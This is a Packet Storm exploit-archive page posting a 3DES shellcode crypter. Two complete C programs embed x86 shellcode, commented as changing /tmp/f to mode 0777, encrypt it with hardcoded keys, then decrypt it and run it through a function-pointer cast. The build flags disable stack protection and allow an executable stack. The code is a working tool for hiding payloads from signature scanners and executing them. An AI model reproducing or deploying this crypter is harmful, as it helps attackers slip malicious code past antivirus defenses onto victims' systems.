what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

3DES Shellcode Crypter

3DES Shellcode Crypter
Posted Jul 11, 2022
Authored by D7X

This tool is a 3DES shellcode crypter.

tags | shellcode
SHA-256 | 9e6475d7e02bb5bcc0b7670b1ca005b4e4ecb987abc3fd2dcd7a5d44af829d04

3DES Shellcode Crypter

Change Mirror Download
# Exploit Title: 3DES Shellcode crypter
# Date: 08/07/2022
# Exploit Author: d7x
# Tested on: Ubuntu x86 / Ubuntu x86_64 / Debian 11 "bullseye"

cat > 3des_crypter.c << EOF
/* ***
*
* 3DES Shellcode crypter by d7x
*
* d7x.promiselabs.net
*
* Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_crypter 3des_crypter.c -lssl -lcrypto
*
* ***/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/des.h>

/* Triple DES key for Encryption and Decryption */
DES_cblock Key1 = "3DES";
DES_cblock Key2 = "Crypter";
DES_cblock Key3 = "by d7x";
DES_key_schedule SchKey1,SchKey2,SchKey3;

/* Print Encrypted and Decrypted bytes */
void print_data(const char *tittle, const void* data, int len);

int main()
{

/* Apply 3DES keys */
DES_set_key((DES_cblock *)Key1, &SchKey1);
DES_set_key((DES_cblock *)Key2, &SchKey2);
DES_set_key((DES_cblock *)Key3, &SchKey3);

/* Place shellcode here */
unsigned char input_data[] = "\xbb\xcc\xfe\x70\x5c\xdb\xd8\xd9\x74\x24\xf4\x5d\x29\xc9\xb1\x08\x83\xc5\x04\x31\x5d\x11\x03\x5d\x11\xe2\x39\x67\x1a\x53\x99\xca\x33\x6c\x19\xeb\xc3\x5c\x6d\x86\xb3\x8d\xeb\x58\x6f\xba\x0c\x59\x8f\x3a\xab\x97\x0f\x50\x4a\x70\xdd\x25";
/* => chmods /tmp/f to 0777 */

/* Init vector */
DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

// DES_cblock iv = { 0xe1, 0xe2, 0xe3, 0xd4, 0xd5, 0xc6, 0xc7, 0xa8 };
DES_set_odd_parity(&iv);

/* Check for Weak key generation: https://www.openssl.org/docs/manmaster/man3/DES_set_key_checked.html,
* If the key is a weak key, then -2 is returned */
if ( -2 == (DES_set_key_checked(&Key1, &SchKey1) || DES_set_key_checked(&Key2, &SchKey2) || DES_set_key_checked(&Key3, &SchKey3)))
{
printf(" Weak key ....\n");
return 1;
}

/* Buffers for Encryption and Decryption */
unsigned char* cipher[sizeof(input_data)];
unsigned char* text[sizeof(input_data)];

/* Triple-DES CBC Encryption */
DES_ede3_cbc_encrypt( (unsigned char*)input_data, (unsigned char*)cipher, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv, DES_ENCRYPT);

/* Triple-DES CBC Decryption */
memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value
DES_set_odd_parity(&iv);
DES_ede3_cbc_encrypt( (unsigned char*)cipher, (unsigned char*)text, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);

/* Place the encrypted output here to verify the integrity */
unsigned char c[] = \
"\xd5\x0c\x1e\xee\xfd\x1f\xb4\x50\xac\xde\x1a\x59\x4c\x10\xe9\x7a\x2c\xb0\x09\x79\x2c\xe0\x28\x17\xf4\x60\xc9\x0a\x33\x27\x48\x03\xc4\x8d\x4d\x26\x0b\x7c\xdd\xa9\xcf\x65\x0f\xac\xd3\xc2\xa8\x67\xde\xf6\x83\x02\x8a\x01\xa8\x1f\x95\x23\x94\x25\xdf\xce\xa3\x79\x0c\xdc\x81\xf7";
unsigned char decrypted[sizeof(c)];

// DES_set_odd_parity(&iv);
memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value
DES_set_odd_parity(&iv);
DES_ede3_cbc_encrypt( (unsigned char*)c, (unsigned char*)decrypted, sizeof(c), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);

/* Printing and Verifying */
print_data("\n Original ",input_data,strlen(input_data));
print_data("\n Encrypted",cipher,strlen(cipher));
print_data("\n Decrypted",text,strlen(input_data));
print_data("\n Decrypted (manual) ",decrypted,strlen(decrypted));

/* Run shellcode */
/* int (*ret)() = (int(*)())decrypted;
ret(); */

return 0;
}

void print_data(const char *tittle, const void* data, int len)
{
printf("%s : ",tittle);
const unsigned char * p = (const unsigned char*)data;
int i = 0;

/* len-1 to omit the \x00 null terminator at the end */
for (; i<len;++i)
printf("\\x%02x", *p++);
printf(" Size: %d", len);

printf("\n");
}
EOF

cat > 3des_decrypt.c << EOF
/* ***
*
* 3DES Shellcode crypter by d7x
*
* d7x.promiselabs.net
*
* Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_decrypt 3des_decrypt.c -lssl -lcrypto
*
* ***/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/des.h>

/* Triple DES key for Encryption and Decryption */
DES_cblock Key1 = "3DES";
DES_cblock Key2 = "Crypter";
DES_cblock Key3 = "by d7x";
DES_key_schedule SchKey1,SchKey2,SchKey3;

/* Print Encrypted and Decrypted data packets */
void print_data(const char *tittle, const void* data, int len);

main()
{

/* Apply 3DES keys */

DES_set_key((DES_cblock *)Key1, &SchKey1);
DES_set_key((DES_cblock *)Key2, &SchKey2);
DES_set_key((DES_cblock *)Key3, &SchKey3);


/* Encrypted shellcode generated by 3des_crypter */
unsigned char shellcode_3des[] = \
"\xd5\x0c\x1e\xee\xfd\x1f\xb4\x50\xac\xde\x1a\x59\x4c\x10\xe9\x7a\x2c\xb0\x09\x79\x2c\xe0\x28\x17\xf4\x60\xc9\x0a\x33\x27\x48\x03\xc4\x8d\x4d\x26\x0b\x7c\xdd\xa9\xcf\x65\x0f\xac\xd3\xc2\xa8\x67\xde\xf6\x83\x02\x8a\x01\xa8\x1f\x95\x23\x94\x25\xdf\xce\xa3\x79\x44\x5d\x82\xff\x40\x5d\x82\xff\x06";


/* Init vector */

DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
DES_set_odd_parity(&iv);

/* buffer for the decrypted string */
unsigned char* decrypted[sizeof(shellcode_3des)];


/* Triple-DES CBC Decryption */

memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value
DES_set_odd_parity(&iv);
DES_ede3_cbc_encrypt( (unsigned char*)shellcode_3des, (unsigned char*)decrypted, sizeof(shellcode_3des), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);

print_data("\n Encrypted",shellcode_3des,sizeof(shellcode_3des));
memcpy(shellcode_3des, decrypted, strlen(decrypted) );
// strcpy(shellcode_3des, decrypted);


/* Printing and executing */

print_data("\n Decrypted",decrypted,strlen(decrypted));


/* Run shellcode */

int (*ret)() = (int(*)())shellcode_3des;
ret();

return 0;
}

void print_data(const char *tittle, const void* data, int len)
{
printf("%s : ",tittle);
const unsigned char * p = (const unsigned char*)data;
int i = 0;

/* len-1 to omit the \x00 null terminator at the end */
for (; i<len;++i)
printf("\\x%02x", *p++);
printf(" Size: %d", len);

printf("\n");
}
EOF
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close